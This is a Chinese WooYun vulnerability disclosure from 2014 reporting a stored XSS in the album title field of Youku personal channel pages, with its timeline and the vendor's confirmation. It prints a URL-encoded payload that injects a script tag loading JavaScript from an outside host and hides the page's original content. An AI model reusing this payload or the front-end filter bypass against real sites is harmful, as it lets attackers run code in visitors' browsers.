当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-069124

漏洞标题:优酷主站stored xss可执行任意js代码

相关厂商:优酷

漏洞作者: 爱上电饭锅

提交时间:2014-07-20 19:43

修复时间:2014-09-03 19:44

公开时间:2014-09-03 19:44

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:17

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-20: 细节已通知厂商并且等待厂商处理中
2014-07-21: 厂商已经确认,细节仅向厂商公开
2014-07-31: 细节向核心白帽子及相关领域专家公开
2014-08-10: 细节向普通白帽子公开
2014-08-20: 细节向实习白帽子公开
2014-09-03: 细节向公众公开

简要描述:

优酷个人频道(XXX的频道)存在存储型XSS,可加载并允许执行任意外部js代码。如为网络红人,可绑架DDoS僵尸。

详细说明:

说来是个毫无水准的洞,但是危害性不小。
漏洞存在于XXX的频道页面,专辑标题编辑处只做了前端JS过滤,直接发request可以随便提交任意HTML代码。
如下图,页面回显做了encode,可是title没有做。导致可以注入HTML。

QQ截图20140720230942.png


测试后发现可以随便插入<script src>引用外站js,并可以顺利执行。于是写了一个有营养的利用代码,把原来的DIV隐藏掉,显示自己的DIV,并执行我的remote js文件打印一段话在页面上,顺便弹框。利用代码如下:
%22%3E%3Cscript%20src%3D%22http%3A%2F%2Fweichch.apphb.com%2Fxss.js%22%3E%3C%2Fscript%3EMalware%20Tag%3Cspan%20class%3D%22append%22%3E%3Ca%20href%3D%22%2Fu%2FUMTYzMjk4NDk5Mg%3D%3D%2Fvideos%22%3E(0)%3C%2Fa%3E%3C%2Fspan%3E%3C%2Fdiv%3E%3Cdiv%20style%3D%22display%3Anone%22%3E
访问个人频道即可触发,效果见漏洞证明部分。

漏洞证明:

QQ截图20140720231501.png

修复方案:

只好加班啦

版权声明:转载请注明来源 爱上电饭锅@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-07-21 07:50

厂商回复:

多谢提醒,马上修复。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-07-21 04:12 | 90sid ( 路人 | Rank:2 漏洞数:1 | (*^__^*))

    前排板凳

  2. 2014-09-04 08:18 | 树上草 ( 路人 | Rank:20 漏洞数:8 | <img height="12" width="12" style="verti...)

    沙发。。